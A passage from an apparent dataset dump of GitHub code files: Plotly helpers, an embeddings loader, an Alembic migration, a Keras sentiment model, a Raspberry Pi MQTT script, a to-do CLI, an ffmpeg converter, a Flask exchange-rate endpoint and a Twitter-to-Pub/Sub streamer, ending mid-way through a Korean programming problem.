measure='microbusiness_density')\n\n\ndef plot_aggregated_cfips_active(df):\n return plot_aggregated_cfips(df, measure='active', mid='sum', include_hi_lo=False, height=config.HEIGHT_PLOT_MEDIUM)\n\n\ndef plot_aggregated_cfips_population(df):\n return plot_aggregated_cfips(df, measure='population', mid='sum', include_hi_lo=False)\n\n\ndef make_plots_cfips(df_train, state):\n if config.MAKE_PLOTS:\n return\n\n # plot_multiple_cfips_microbiz_dens(df_train.filter(pl.col('state') == state))\n plot_multiple_cfips_active(df_train.filter(pl.col('state') == state))\n # plot_multiple_cfips_population(df_train.filter(pl.col('state') == state))\n\n # plot_aggregated_cfips_microbiz_dens(df_train.filter(pl.col('state') == state))\n plot_aggregated_cfips_active(df_train.filter(pl.col('state') == state))\n # plot_aggregated_cfips_population(df_train.filter(pl.col('state') == state))\n\n\ndef get_stats(values, by, sub_na_with=None):\n if sub_na_with is not None:\n by = np.array(by)\n by[~(by == by)] = sub_na_with\n d = pd.DataFrame({'values': np.array(values).astype('float'), 'by': np.array(by)})\n d_agg = d.groupby('by', as_index=False).agg(\n count=('values', len),\n min=('values', np.nanmin),\n p10=('values', lambda x: np.nanpercentile(x, 10)),\n p25=('values', lambda x: np.nanpercentile(x, 25)),\n p50=('values', lambda x: np.nanpercentile(x, 50)),\n mean=('values', np.nanmean),\n sd=('values', np.nanstd),\n p75=('values', lambda x: np.nanpercentile(x, 75)),\n p90=('values', lambda x: np.nanpercentile(x, 90)),\n max=('values', np.nanmax)\n )\n return d_agg\n\n\ndef get_box_chart(x, y, name=None, return_stats=False, order_by_count=False, min_prc_count=None, sub_na_with=None, **kwargs):\n d_agg = get_stats(y, x, sub_na_with)\n\n if order_by_count:\n d_agg = 
d_agg.sort_values(['count'], ascending=False)\n\n if min_prc_count is not None:\n d_agg = d_agg.loc[d_agg['count'] > (min_prc_count*sum(d_agg['count']))]\n\n box = go.Box(\n name=name,\n x=d_agg['by'],\n lowerfence=d_agg['p10'],\n q1=d_agg['p25'],\n median=d_agg['p50'],\n mean=d_agg['mean'],\n q3=d_agg['p75'],\n upperfence=d_agg['p90'],\n # boxpoints=False,\n # boxmean=True,\n **kwargs\n )\n if return_stats:\n return box, d_agg\n else:\n return box\n\n\ndef plot_box_plot(target_values, by_values, yaxis_title='value', xaxis_title='by', x_as_category=True,\n order_by_count=False, min_prc_count=None, sub_na_with=None):\n fig = go.Figure()\n trace_ = get_box_chart(x=by_values, y=target_values, name=xaxis_title,\n order_by_count=order_by_count, min_prc_count=min_prc_count, sub_na_with=sub_na_with)\n fig.add_trace(trace_)\n fig.update_layout(\n title='',\n autosize=True, legend=dict(x=0, y=1, bgcolor='rgba(0,0,0,0)'), height=config.HEIGHT_PLOT_MEDIUM, # width=1200,\n margin=dict(l=25, r=25, t=25, b=25), # yaxis_range=rng_y_boxplot, # boxmode='group',\n xaxis_title=xaxis_title,\n yaxis_title=yaxis_title,\n )\n if x_as_category:\n fig.update_xaxes(type='category')\n\n return fig\n","repo_name":"nicolaivicol/gd-mbiz-dens-fcst","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":13068,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"33578568260","text":"from tqdm import tqdm\nimport numpy as np\n\n\ndef read_embeddings(fname, encoding='utf-8'):\n with open(fname, 'r', encoding=encoding) as src:\n header = src.readline()\n wordcount, vectorsize = map(int, header.split())\n word2index = {}\n vectors = np.zeros([wordcount, vectorsize])\n for i in tqdm(range(wordcount)):\n row = src.readline().split()\n if len(row) != vectorsize + 1:\n continue\n word = row[0]\n vector = np.array(list(map(float, row[1:])))\n word2index[word] = i\n vectors[i, :] = vector\n return word2index, vectors\n\n\ndef save_embeddings(fname, word2index, vectors, encoding='utf-8'):\n with open(fname, 'w', encoding=encoding) as target:\n target.write('{0} {1}\\n'.format(len(word2index), vectors.shape[1]))\n for word, index in tqdm(word2index.items(), total=len(word2index)):\n vector = vectors[index]\n vector_str = ' '.join(map(str, vector))\n target.write('{0} {1}\\n'.format(word, vector_str))\n\n\ndef cutten_embeddings(wordset, word2index, vectors):\n word2index_cut = {}\n for word in tqdm(sorted(wordset)):\n if word not in word2index:\n continue\n word2index_cut[word] = len(word2index_cut)\n vectors_cut = np.zeros([len(word2index_cut) + 1, vectors.shape[1]])\n for word, index in tqdm(word2index_cut.items()):\n vectors_cut[index, :] = vectors[word2index[word]]\n return word2index_cut, vectors_cut\n","repo_name":"QtRoS/nodl_toxic","sub_path":"toxic-neural/embeddings.py","file_name":"embeddings.py","file_ext":"py","file_size_in_byte":1514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"11926911587","text":"\"\"\"posts tag\n\nRevision ID: c8d93aa46fe8\nRevises: 7040ce8985c8\nCreate Date: 2020-03-18 19:11:48.214433\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'c8d93aa46fe8'\ndown_revision = '7040ce8985c8'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n op.create_index(op.f('ix_softwares_dateRelease'), 'softwares', ['dateRelease'], unique=False)\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_index(op.f('ix_softwares_dateRelease'), table_name='softwares')\n # ### end Alembic commands ###\n","repo_name":"pbaesse/dados-livres","sub_path":"migrations/versions/c8d93aa46fe8_posts_tag.py","file_name":"c8d93aa46fe8_posts_tag.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"18"} +{"seq_id":"71427538920","text":"# This Python 3 environment comes with many helpful analytics libraries installed\n# It is defined by the kaggle/python docker image: https://github.com/kaggle/docker-python\n# For example, here's several helpful packages to load in \n\nimport numpy as np # linear algebra\nimport pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)\n\n# Input data files are available in the \"../input/\" directory.\n# For example, running this (by clicking run or pressing Shift+Enter) will list the files in the input directory\n\nimport os\nprint(os.listdir(\"../input\"))\n\n# Any results you write to the current directory are saved as output.\ntrain = pd.read_csv('../input/movie-review-sentiment-analysis-kernels-only/train.tsv', sep=\"\\t\")\ntest = pd.read_csv('../input/movie-review-sentiment-analysis-kernels-only/test.tsv', sep=\"\\t\")\nsub = pd.read_csv('../input/movie-review-sentiment-analysis-kernels-only/sampleSubmission.csv', sep=\",\")\nfull_text = list(train['Phrase'].values) + list(test['Phrase'].values)\nimport pandas as pd\nimport numpy as np\nfrom sklearn.preprocessing import OneHotEncoder\n\nimport keras \nfrom keras.preprocessing.text import Tokenizer\nfrom keras.preprocessing.sequence import pad_sequences\nfrom keras.layers import Dense, Input, LSTM, Embedding, Dropout, Activation, Conv1D, GRU\nfrom keras.layers import Bidirectional, GlobalMaxPool1D, MaxPooling1D, Add, Flatten\nfrom keras.layers import GlobalAveragePooling1D, GlobalMaxPooling1D, concatenate, SpatialDropout1D, BatchNormalization\nfrom keras.models import Model, load_model\nfrom keras import initializers, regularizers, constraints, optimizers, layers, callbacks\nfrom keras import backend as K\nfrom keras.engine import InputSpec, Layer\nfrom keras.optimizers import Adam, RMSprop\n\nfrom keras.callbacks import Callback, EarlyStopping, ModelCheckpoint, LearningRateScheduler\ntokenizer = Tokenizer(lower = True, filters = '')\ntokenizer.fit_on_texts(full_text)\ntrain_tokenized = tokenizer.texts_to_sequences(train['Phrase'])\ntest_tokenized = tokenizer.texts_to_sequences(test['Phrase'])\nmax_len = 50\nX_train = pad_sequences(train_tokenized, maxlen = max_len)\nX_test = pad_sequences(test_tokenized, maxlen = max_len)\nX_train.shape\nX_test.shape\nembedding_path = \"../input/fasttext-crawl-300d-2m/crawl-300d-2M.vec\"\nembed_size = 300\nmax_features = 20000\ndef get_coefs(word,*arr):\n return word, np.asarray(arr, dtype='float32')\ndef get_embed_mat(embedding_path):\n \n embedding_index = dict(get_coefs(*o.strip().split(\" \")) for o in open(embedding_path))\n\n word_index = tokenizer.word_index\n nb_words = min(max_features, len(word_index))\n embedding_matrix = np.zeros((nb_words + 1, embed_size))\n for word, i in word_index.items():\n if i >= max_features:\n continue\n embedding_vector = embedding_index.get(word)\n if embedding_vector is not None:\n embedding_matrix[i] = embedding_vector\n \n 
return embedding_matrix\ny = train['Sentiment']\n\none_hot_encoder = OneHotEncoder(sparse=False)\ny_one_hot = one_hot_encoder.fit_transform(y.values.reshape(-1, 1))\nfile_path = \"model.hdf5\"\ncheck_point = ModelCheckpoint(file_path, monitor = \"val_loss\", verbose = 1,\n save_best_only = True, mode = \"min\")\nearly_stop = EarlyStopping(monitor = \"val_loss\", mode = \"min\", patience = 10)\nfrom keras.preprocessing.text import Tokenizer\nfrom keras.preprocessing.sequence import pad_sequences\nfrom keras.layers import Dense, Input, LSTM, Embedding, Dropout, Activation, Conv1D, GRU, CuDNNGRU, CuDNNLSTM, BatchNormalization\nfrom keras.layers import Bidirectional, GlobalMaxPool1D, MaxPooling1D, Add, Flatten\nfrom keras.layers import GlobalAveragePooling1D, GlobalMaxPooling1D, concatenate, SpatialDropout1D\nfrom keras.models import Model, load_model\nfrom keras import initializers, regularizers, constraints, optimizers, layers, callbacks\nfrom keras import backend as K\nfrom keras.engine import InputSpec, Layer\nfrom keras.optimizers import Adam\n\nfrom keras.callbacks import ModelCheckpoint, TensorBoard, Callback, EarlyStopping\ndef build_model(lr = 0.0, lr_d = 0.0, units = 0, dr = 0.0):\n inp = Input(shape = (max_len,))\n x = Embedding(19479, embed_size, weights = [embedding_matrix], trainable = False)(inp)\n x1 = SpatialDropout1D(dr)(x)\n\n x_gru = Bidirectional(CuDNNGRU(units, return_sequences = True))(x1)\n x1 = Conv1D(32, kernel_size=3, padding='valid', kernel_initializer='he_uniform')(x_gru)\n avg_pool1_gru = GlobalAveragePooling1D()(x1)\n max_pool1_gru = GlobalMaxPooling1D()(x1)\n \n x3 = Conv1D(32, kernel_size=2, padding='valid', kernel_initializer='he_uniform')(x_gru)\n avg_pool3_gru = GlobalAveragePooling1D()(x3)\n max_pool3_gru = GlobalMaxPooling1D()(x3)\n \n x_lstm = Bidirectional(CuDNNLSTM(units, return_sequences = True))(x1)\n x1 = Conv1D(32, kernel_size=3, padding='valid', kernel_initializer='he_uniform')(x_lstm)\n avg_pool1_lstm = GlobalAveragePooling1D()(x1)\n max_pool1_lstm = GlobalMaxPooling1D()(x1)\n \n x3 = Conv1D(32, kernel_size=2, padding='valid', kernel_initializer='he_uniform')(x_lstm)\n avg_pool3_lstm = GlobalAveragePooling1D()(x3)\n max_pool3_lstm = GlobalMaxPooling1D()(x3)\n \n \n x = concatenate([avg_pool1_gru, max_pool1_gru, avg_pool3_gru, max_pool3_gru,\n avg_pool1_lstm, max_pool1_lstm, avg_pool3_lstm, max_pool3_lstm])\n x = BatchNormalization()(x)\n x = Dropout(0.1)(Dense(128,activation='relu') (x))\n x = BatchNormalization()(x)\n x = Dropout(0.1)(Dense(64,activation='relu') (x))\n x = Dense(5, activation = \"sigmoid\")(x)\n model = Model(inputs = inp, outputs = x)\n model.compile(loss = \"binary_crossentropy\", optimizer = Adam(lr = lr, decay = lr_d), metrics = [\"accuracy\"])\n history = model.fit(X_train, y_one_hot, batch_size = 128, epochs = 20, validation_split=0.1, \n verbose = 1, callbacks = [check_point, early_stop])\n model = load_model(file_path)\n return model\nembedding_matrix = get_embed_mat(embedding_path)\nmodel = build_model(lr = 1e-3, lr_d = 0, units = 128, dr = 0.5)\npred = model.predict(X_test, batch_size = 1024, verbose = 1)\npred\npredictions = np.round(np.argmax(pred, axis=1)).astype(int)\npredictions\nsub['Sentiment'] = predictions\nsub.to_csv(\"new_sub.csv\", index=False)\n","repo_name":"aorursy/new-nb-3","sub_path":"jayachandra1221_rnn-lstm.py","file_name":"jayachandra1221_rnn-lstm.py","file_ext":"py","file_size_in_byte":6284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} 
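A note on the record above: its get_embed_mat builds the weight matrix for the frozen Embedding layer by copying each pretrained vector into the row indexed by that word's tokenizer id. Below is a minimal, self-contained sketch of just that lookup step; the three-word vocabulary and 4-dimensional vectors are hypothetical stand-ins for tokenizer.word_index and the crawl-300d-2M.vec file used in the record.

import numpy as np

# Hypothetical stand-ins: the record reads these from a fitted Keras Tokenizer
# and a fastText .vec file (there, embed_size = 300 and max_features = 20000).
word_index = {"movie": 1, "great": 2, "boring": 3}  # token -> integer id
embedding_index = {"movie": np.ones(4), "great": np.full(4, 0.5)}
embed_size = 4
max_features = 20000

nb_words = min(max_features, len(word_index))
embedding_matrix = np.zeros((nb_words + 1, embed_size))  # row 0 stays zero for padding
for word, i in word_index.items():
    if i >= max_features:
        continue
    vector = embedding_index.get(word)
    if vector is not None:
        embedding_matrix[i] = vector  # row i holds the pretrained vector for id i

print(embedding_matrix)  # "boring" has no pretrained vector, so its row stays all zero

Rows left at zero (the padding row and out-of-vocabulary words) contribute nothing to the model, which the record keeps fixed by passing trainable = False to the Embedding layer.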
+{"seq_id":"6831066974","text":"#rasberry pi IO\nimport RPi.GPIO as GPIO\n#MCP3008 IO\nimport Adafruit_GPIO.SPI as SPI\nimport Adafruit_MCP3008\n#MCP3008 setting up\nSPI_PORT = 0\nSPI_DEVICE = 0\nmcp = Adafruit_MCP3008.MCP3008(spi=SPI.SpiDev(SPI_PORT, SPI_DEVICE))\n\n\n#setup LED\nledGPIOnum = 26 #pin number on PI\nGPIO.setmode(GPIO.BCM)\nGPIO.setwarnings(False)\nGPIO.setup(ledGPIOnum,GPIO.OUT)\nLEDstate = 0\n#setup MCP print\nsoundChannelPin = 4\ngateChannelPin = 1\naudioChannelPin = 3\n#pin channels\n#gate = 1\n#light = 2\n#audio = 3\n#envelope = 4\n\n\n\n\nimport paho.mqtt.client as mqtt\nimport json as js\nimport time\n\n#import nearby devices\nimport proximity as prox\n\n\n#MQTT_SERVER = \"localhost\"\n#MQTT_SERVER = \"iot.eclipse.org\"\n#MQTT_SERVER = \"100.80.241.236\"\nMQTT_SERVER = \"192.168.137.110\"\nMQTT_PATH = \"broadcast\"\n\nsoundValue = 0\nregistry = {}\naddressList = []\nproxRegis = {}\ncurrent_3audioReadings = {}\n\ninfo = {'device_id':'B8:27:EB:DF:DO:DD','sensors':['Temperature', 'Audio', 'Gate', 'Envelope', 'Humidity', 'Light']}\n\n\n# The callback for when the client receives a CONNACK response from the server.\ndef on_connect(client, userdata, flags, rc):\n print(\"Connected with result code \"+str(rc))\n # Subscribing in on_connect() means that if we lose the connection and\n\n #-- Finds Broadcast and Sends Data to other devices on Broadcast --#\n #if (message_sent_State == False):\n client.subscribe(MQTT_PATH)\n #client.publish(MQTT_PATH, js.dumps(info, sort_keys=True))\n message_sent_State = True\n #client.publish(MQTT_PATH, \"HMM\")\n #print(js.dumps(info, sort_keys=True))\n\n #-- Listens for response --#\n client.subscribe(info['device_id'])\n client.subscribe(info['device_id']+'/sound')\ndef on_disconnect(client, userdata, msg):\n message_sent_State = False\n\n# Callback when message is recieved.\ndef on_message(client, userdata, msg):\n global registry,proxRegis\n print(msg.topic+\" \"+str(msg.payload))\n\n\n\n #parse and save\n #if (msg.topic != info['device_id']):\n try:\n input_data = js.loads(msg.payload)\n except:\n print(\"load failed\")\n\n print(input_data)\n registry[input_data['device_id']] = input_data['sensors']\n print(input_data['device_id'])\n #publish directly to new id\n client.publish(input_data['device_id'],js.dumps(info))\n addressList = prox.proximity()\n if input_data['device_id'] in addressList:\n proxRegis[input_data['device_id']] = True\n\n else:\n proxRegis[input_data['device_id']] = False\n print(\"List if nearby devices \\n\")\n print(js.dumps(proxRegis, indent=4))\n\n\ndef on_message_Sound(client, userdata, msg):\n global registry,proxRegis,current_3audioReadings,LEDstate\n listVal = {}\n print(\"sound callback\")\n try:\n input_data = js.loads(msg.payload)\n except:\n print(\"load failed\")\n #give data to request portion\n if 'device_id' in input_data:\n print(\"DEVICE ID\")\n #for sensor in input_data['sensors']:\n listVal['Envelope'] = soundValue\n client.publish(input_data['device_id']+'/sound', js.dumps(listVal))\n #take data and compare it to ourvalues\n else:\n print(\"Soundvalue on Callback\" + str(current_3audioReadings['Envelope']))\n if int(input_data['Envelope']) > int(current_3audioReadings['Envelope']):\n print(\"DATA\")\n if LEDstate == 1:\n GPIO.output(ledGPIOnum,GPIO.LOW)\n LEDstate = 0\n if LEDstate == 0:\n GPIO.output(ledGPIOnum,GPIO.HIGH)\n LEDstate = 1\n\n#this portion is just a on_message_Sound(Request portion of Code used to\n#Colaborate with Matt's Group)\ndef on_message_clap_detected(client,userdata,msg):\n 
#callback function takes request from specific pi with device_id and\n #gives back our sound data to clap_response+device_id\n\n #Assumes they give the device_id\n global current_3audioReadings,LEDstate\n listVal = {}\n print(\"clap_detected request callback\")\n try:\n input_data = js.loads(msg.payload)\n except:\n print(\"load failed\")\n #iterate through values needed, find if a list of sensors exists\n if 'sensors' in input_data:\n for sensors in input_data['sensors']:\n if sensors in current_3audioReadings:\n listVal[sensors] = current_3audioReadings[sensors]\n #if the sensor wanted is empty assume they want at least one sound value\n else:\n listVal['Envelope'] = current_3audioReadings['Envelope'] #envelope value\n listVal['Gate'] = current_3audioReadings['Gate'] #gate value\n listVal['Audio'] = current_3audioReadings['Audio'] #audio value\n\n client.publish('clap_response'+input_data['device_id'], js.dumps(listVal))\n\n\n\nclient = mqtt.Client()\n\nclient.on_connect = on_connect\nclient.on_message = on_message\nclient.on_disconnect = on_disconnect\nclient.message_callback_add(\"B8:27:EB:DF:D0:DD/sound\", on_message_Sound)\nclient.message_callback_add(\"clap_detected\", on_message_Sound)\n\nclient.connect(MQTT_SERVER, 1883, 60)\n\ntry:\n client.publish(MQTT_PATH, js.dumps(info, sort_keys=True))\nexcept:\n print(\"Did not publish\")\n\n\n# Blocking call that processes network traffic, dispatches callbacks and\n# handles reconnecting.\n# Other loop*() functions are available that give a threaded interface and a\n# manual interface.\n#client.loop_forever()\nsoundValue = 0\nLEDstate = 0\nprevsoundValue = 0\nclient.loop_start()\nwhile True:\n\n soundValue = mcp.read_adc(soundChannelPin)#same as envelope\n gateValue = mcp.read_adc(gateChannelPin)\n audioValue = mcp.read_adc(audioChannelPin)\n if gateValue >= 600:\n time.sleep(.2)\n print(\"made it\")\n current_3audioReadings['Gate'] = gateValue\n current_3audioReadings['Audio'] = audioValue\n current_3audioReadings['Envelope'] = soundValue #envelope value\n\n current_soundValue = soundValue\n\n if LEDstate == 1:\n GPIO.output(ledGPIOnum,GPIO.LOW)\n LEDstate = 0\n elif LEDstate == 0:\n GPIO.output(ledGPIOnum,GPIO.HIGH)\n LEDstate = 1\n\n #send to all connected devices\n wanted_info = {'device_id':'B8:27:EB:DF:D0:DD','sensors':['Gate','Envelope','Audio']}\n if proxRegis:\n for pi in proxRegis:\n #print(\"this is the pi:\" + pi)\n if ('Envelope' in registry[pi]) and (proxRegis[pi] == True):\n #print(\"This is the registry:\" + str(registry[pi]))\n client.publish(pi+'/sound', js.dumps(wanted_info))\n\n\n time.sleep(0.2)\n\n#LED pin setup\n","repo_name":"bjalvara/mqtt","sub_path":"orchestration.py","file_name":"orchestration.py","file_ext":"py","file_size_in_byte":6517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"72456078119","text":"import pandas as pd\n\nclass Frecuencia:\n def __init__(self):\n self.data = pd.read_csv('../recursos/frequency_wikimedia', sep=\" \", header=None)\n self.data.columns = ['numero', 'palabra', 'frecuencia']\n self.data = self.data.drop(columns=['numero'])\n\n def obtener_frecuencia(self, palabra):\n token = palabra['token'].lower()\n if token in self.data['palabra'].tolist():\n elem = self.data.loc[self.data['palabra'] == token]['frecuencia']\n return elem.tolist()[0]\n else:\n return 0.0\n\n def obtener_mas_frecuente(self, lista_palabras):\n frecuencia_maxima = max([self.obtener_frecuencia(x) for x in lista_palabras])\n for palabra in 
lista_palabras:\n if self.obtener_frecuencia(palabra) == frecuencia_maxima:\n return palabra\n\n def ordenar_por_frecuencia(self, lista_palabras):\n return list(reversed(sorted(lista_palabras, key=self.obtener_frecuencia)))\n","repo_name":"joacolej/proygrado","sub_path":"src/recursos/lista_de_frecuencia.py","file_name":"lista_de_frecuencia.py","file_ext":"py","file_size_in_byte":971,"program_lang":"python","lang":"es","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"} +{"seq_id":"31716504622","text":"import pprint #like var_dump\nimport sys\nimport os #files\nimport csv \n\n\nDATABASEFILE=\"database.csv\"\nCHECKBOX_COLUMN_NAME='Done'\nTODO_COLUMN_NAME='To do'\n\nclass bcolors:\n OKGREEN = '\\033[92m'\n WARNING = '\\033[93m'\n FAIL = '\\033[91m'\n ENDC = '\\033[0m'\n Default = '\\033[99m'\n\n\ndef clear_console():\n \"\"\"Clearing console\"\"\"\n os.system('cls' if os.name=='nt' else 'clear')\n\n\ndef print_warning(warning, type='yellow'):\n \"\"\"Information print\"\"\"\n if type=='yellow':\n print(bcolors.WARNING+\"------------------------------\\n\"\n + warning\n +\" \\n------------------------------\"+bcolors.ENDC)\n \n if type=='red':\n print(bcolors.FAIL+\"------------------------------\\n\"\n + warning\n +\" \\n------------------------------\\n\"+bcolors.ENDC)\n if type=='green':\n print(bcolors.OKGREEN+\"------------------------------\\n\"\n + warning\n +\" \\n------------------------------\\n\"+bcolors.ENDC) \n\n\n\ndef add(item_to_add):\n \"\"\"Add item to list in file\"\"\"\n\n with open(DATABASEFILE, 'a' ) as csvfile:\n fieldnames = [CHECKBOX_COLUMN_NAME, TODO_COLUMN_NAME]\n writer = csv.DictWriter(csvfile, fieldnames=fieldnames)\n writer.writerow({CHECKBOX_COLUMN_NAME: ' ', TODO_COLUMN_NAME: item_to_add})\n clear_console()\n print_warning(\"Item added.\", 'green') \n todo_list(write=True)\n \n\ndef save_to_file(data):\n \"\"\"Save data to file\"\"\"\n\n with open(DATABASEFILE, 'w') as csvfile:\n fieldnames = [CHECKBOX_COLUMN_NAME, TODO_COLUMN_NAME]\n writer = csv.DictWriter(csvfile, fieldnames=fieldnames)\n \n for item in data:\n writer.writerow({CHECKBOX_COLUMN_NAME: item[1], TODO_COLUMN_NAME: item[2]})\n\n\ndef todo_list(write=0):\n \"\"\"List of todo\"\"\"\n \n with open(DATABASEFILE, newline='') as f:\n reader = csv.reader(f)\n list_todo = []\n if write is True:\n print(\"You saved the following to-do items: \\n \")\n i=0\n for row in reader:\n if i != 0:\n print(\" %3d.\" % (i) + \" [\" + str(row[0]) + \"] \" + str(row[1]))\n list_todo.append([i, row[0], row[1]])\n i+=1\n print()\n i=0 \n \n for row in reader:\n list_todo.append([i, row[0], row[1]])\n i+=1\n\n return list_todo \n\n\ndef mark_todo(mark=True):\n \"\"\"marking items\"\"\" \n \n td_list=todo_list(True) #write todo list\n while True:\n try: \n if (mark==False):\n mark_number=input('Which one you want to unmark (or Press Enter to leave): ')\n if mark_number=='x' or mark_number=='':\n clear_console()\n todo_list(write=True)\n break\n td_list[int(mark_number)][1]=str(' ')\n clear_console()\n print_warning(\"Item unmarked.\") \n else:\n mark_number=input('Which one you want to mark as completed (or Press Enter to leave): ')\n if mark_number=='x' or mark_number=='':\n clear_console()\n todo_list(write=True)\n break\n td_list[int(mark_number)][1]='x' \n clear_console()\n print_warning(\"Item marked.\") \n save_to_file(td_list) \n todo_list(write=True)\n\n except ValueError:\n \n clear_console()\n print_warning(\"It is not a number.\",'red') \n mark_todo()\n except IndexError:\n clear_console()\n 
print_warning(\"There is no item with this ID\",'red') \n mark_todo()\n\n \n \ndef archive():\n \"\"\"delete marked items from list\"\"\"\n\n to_do_list=todo_list(0)\n newtodolist=[]\n for item in to_do_list:\n if item[1] != 'x':\n newtodolist.append([' ', item[1], item[2]]) \n \n save_to_file(newtodolist)\n print_warning(\"Deleted marked items\", 'red')\n todo_list(write=True)\n\n\ndef checkdatabase():\n \"\"\"checking database file, if !exist than create it\"\"\" \n\n if not os.path.exists(DATABASEFILE):\n with open(DATABASEFILE, 'w') as csvfile:\n fieldnames = [CHECKBOX_COLUMN_NAME, TODO_COLUMN_NAME]\n writer = csv.DictWriter(csvfile, fieldnames=fieldnames)\n writer.writeheader()\n \n\ndef main():\n clear_console()\n todo_list(write=True)\n\n while True:\n \n action=input( \"Please specify a command [add, mark, unmark, archive, x to exit]: \")\n clear_console()\n\n if action == \"add\": #loop: adding todo items\n item_to_add=' '\n todo_list(write=True)\n while item_to_add!='':\n item_to_add=input('Add an item (or press enter to leave): ')\n if (item_to_add!=''):\n add(item_to_add)\n else:\n clear_console()\n todo_list(write=True)\n \n\n elif action == \"list\": #this is not used, list is always visible\n clear_console()\n todo_list(write=True)\n\n elif action == \"mark\":\n mark_todo()\n \n\n elif action == \"unmark\":\n mark_todo(False)\n \n\n elif action == \"archive\":\n archive()\n \n\n elif action==\"x\": #exit program\n break \n \n else:\n print_warning(\"Error: wrong command!\", 'red') \n todo_list(write=True)\n \n\n\n\ncheckdatabase() #if file doesn't exist than create it'\nmain()","repo_name":"michalosak/calculator","sub_path":"todo.py","file_name":"todo.py","file_ext":"py","file_size_in_byte":5747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"31343441875","text":"import subprocess\nimport os\nimport stat\nimport platform\n\nfrom helpers import asyncronize_function\n\nconverter_path = None\n\nif \"Windows\" in platform.architecture()[1]:\n converter_path = \"./ffmpeg.exe\"\nelse:\n converter_path = \"./ffmpeg\"\n st = os.stat(\"./ffmpeg\")\n os.chmod(\"./ffmpeg\", st.st_mode | stat.S_IEXEC)\n\nasync def convert(voice_ogg_content):\n completedProcess = await asyncronize_function(\n subprocess.run,\n [converter_path, \"-i\", \"pipe:0\", \"-f\", \"wav\", \"pipe:1\"],\n input=voice_ogg_content,\n capture_output=True\n )\n return completedProcess.stdout","repo_name":"dozen1488/telebot","sub_path":"modules/convert_ogg_module.py","file_name":"convert_ogg_module.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"28184811690","text":"from dataclasses import asdict\n\nimport requests\nfrom flask import request, jsonify, Blueprint\nfrom config import configuration\nfrom app.dto.get_exchange_rate_response import GetExchangeRateResponse\nfrom app.helpers.check_currencies import check_currencies\nfrom app.decorators.auth import token_required\n\nmodule = Blueprint(\"exchange\", __name__, url_prefix=\"/exchange\")\n\n\n@module.route('/pair', methods=['POST', 'GET'])\n@token_required()\ndef get_exchange_rate():\n from_currency = request.json['from'] # marshmallow Validation icin.\n to_currency = request.json['to']\n url = configuration.BASE_URL + configuration.API_KEY\n if check_currencies(from_currency, to_currency):\n pair_url = url + \"/pair/\" + from_currency + \"/\" + to_currency\n print(\"pair_url \" + pair_url)\n 
print(\"pair_url \" + pair_url)\n response = requests.get(pair_url)\n conversion_rate = response.json()['conversion_rate']\n base_code = response.json()['base_code']\n target_code = response.json()['target_code']\n return asdict(\n GetExchangeRateResponse(conversion_rate=conversion_rate,\n base_code=base_code,\n target_code=target_code))\n else:\n return jsonify({\"conversion_rate\": \"The Currency is not correct!!!\"})\n","repo_name":"ozgurshahin/ExchangeRateApi","sub_path":"app/routes/exchange.py","file_name":"exchange.py","file_ext":"py","file_size_in_byte":1332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"36782941916","text":"from tweepy import Stream\nfrom tweepy import OAuthHandler\nfrom tweepy.streaming import StreamListener\nimport json\nimport twitter_credentials as tw\nfrom google.cloud import pubsub_v1\n#from vaderSentiment.vaderSentiment import SentimentIntensityAnalyzer\n\n\n#analyzer = SentimentIntensityAnalyzer()\n\nproject_id = \"cf-learninggcp-123\"\ntopic_name = \"tweets\"\n\npublisher = pubsub_v1.PublisherClient()\ntopic_path = publisher.topic_path(project_id, topic_name)\n\n#consumer key, consumer secret, access token, access secret.\nckey=tw.CONSUMER_KEY\ncsecret=tw.CONSUMER_SECRET\natoken=tw.ACCESS_TOKEN\nasecret=tw.ACCESS_TOKEN_SECRET\n\nclass listener(StreamListener):\n\n def on_data(self, data):\n try:\n data = json.loads(data)\n tweet = data['text']\n created_at = data['created_at']\n source = data['source']\n usuario = data['user']['name']\n ubicacion = data['user']['location']\n coordenadas = data['geo']\n time_ms = data['timestamp_ms']\n # vs = analyzer.polarity_scores(tweet)\n # sentiment = vs['compound']\n mensaje = json.dumps({\"twitter\": tweet, \"time_stamp\": time_ms, \"created_at\": created_at, \"source\": source, 'usuario': usuario, 'ubicacion': ubicacion, 'coordenadas': coordenadas})\n\n print(mensaje)\n future = publisher.publish(topic_path, mensaje)\n print(future.result())\n\n except KeyError as e:\n print(str(e))\n return(True)\n\n def on_error(self, status):\n print(status)\n\nauth = OAuthHandler(ckey, csecret)\nauth.set_access_token(atoken, asecret)\n\ntwitterStream = Stream(auth, listener())\ntwitterStream.filter(track=[\"fibertel\", \"cablevision\", \"@personal\"])","repo_name":"cesarfarallo/twitter","sub_path":"twitter_TECO.py","file_name":"twitter_TECO.py","file_ext":"py","file_size_in_byte":1736,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"22041190542","text":"# 팔씨름 문제\n\n# 소정이와 세정이는 점심 값을 누가 낼 지 정하기 위해 팔씨름을 하기로 했다. 공정하고 재밌는 경기를 위해 둘은 15번 팔씨름을 하여 8번 이상 이기는 사람이 점심 값을 면제받기로 하였다.\n\n# 둘은 지금까지 k번의 팔씨름을 진행했다. 이 결과는 길이가 k인 ‘o’ 또는 ‘x’로만 구성된 문자열 